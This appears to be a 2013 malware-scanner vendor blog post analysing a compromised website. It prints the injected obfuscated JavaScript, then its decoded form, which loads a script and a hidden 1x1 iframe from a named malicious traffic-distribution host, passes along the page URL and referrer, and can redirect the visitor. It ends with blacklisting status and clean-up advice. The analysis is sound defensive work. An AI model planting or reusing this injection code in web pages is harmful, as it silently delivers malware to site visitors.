Wednesday, August 14, 2013

Malware on website injects malicious JavaScript from the remote server

Website infected with malicious obfuscated JavaScript that injects another JavaScript from third party server to deliver attack

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This compromised website has suspicious JavaScript code injected in files. Malware was found on this website's pages by Google Safe Browsing including 4 trojans.

Quttera website malware scanner detected obfuscated JavaScript that loads another JavaScript from remote server. The attack itself is delivered by the third party JavaScript. This post describes how it is done.

Malicious action

Malicious JavaScript loads another malicious JavaScript from the remote server.

Website malware scanner report

Submission date: Thu Aug 8 09:59:56 2013
Infected website's files: 6
Website malware scan report link: Sitescan report link

Quttera website malware scanner.
Quttera website malware scanner.



Threat dump:

Quttera website malware scanner. Malicious JavaScript detected on scanned website
Quttera website malware scanner. Malicious JavaScript detected on scanned website




Malware entry details

Beautified script

  1. document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));
  2. dF('&4Dtdsjqu&4Fepdvnfou/xsjuf&39&33&4Dtdsjqu&31tsd&4E&6D&33&33,&33iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G3&37tfpsfg&4E&33,fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ`SFGFSFS&4E&33,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu`lfzxpse&4Eopuefgjof&33,&33&6D&33&4F&4D&6D0tdsjqu&4F&33&3:&4C&4D0tdsjqu&4F&1B&4Dtdsjqu&4F&1Bjg&39uzqfpg&39i&3:&4E&4E&33voefgjofe&33&3:&8C&1:&1B&1:epdvnfou/xsjuf&39&33&4Djgsbnf&31tsd&4E&38iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G4&37tfpsfg&4E&33,fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ`SFGFSFS&4E&33,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu`lfzxpse&4Eopuefgjof&38&31xjeui&4E2&31ifjhiu&4E2&31cpsefs&4E1&31gsbnfcpsefs&4E1&4F&4D0jgsbnf&4F&33&3:&4C&31&1B&8E&1Bfmtf&31jg&39i/joefyPg&39&33iuuq&4B&33&3:&4E&4E1&3:&8C&1B&1:&1:xjoepx/mpdbujpo&4Ei&4C&1B&8E&1B&4D0tdsjqu&4F1');



Malicious payload


Decoded payload injects malicious JavaScript from  http://itsallbreaksoft.net/tds/in.cgi

  1. <script>document.write("<script src=\""+"http://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=notdefine"+"\"><\/script>");</script>
  2. <script>
  3. if(typeof(h)=="undefined"){    
  4.         document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>");
  5. }
  6. else if(h.indexOf("http:")==0){
  7.                 window.location=h;
  8. }
  9. </script>


Blacklisting status

Website is Blacklisted by Google Safe Browsing



Google Blacklisted.

Domain from which the JavaScript was downloaded is Blacklisted by McAfee, Yandex and ESET


VirusTotal analysis report.

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.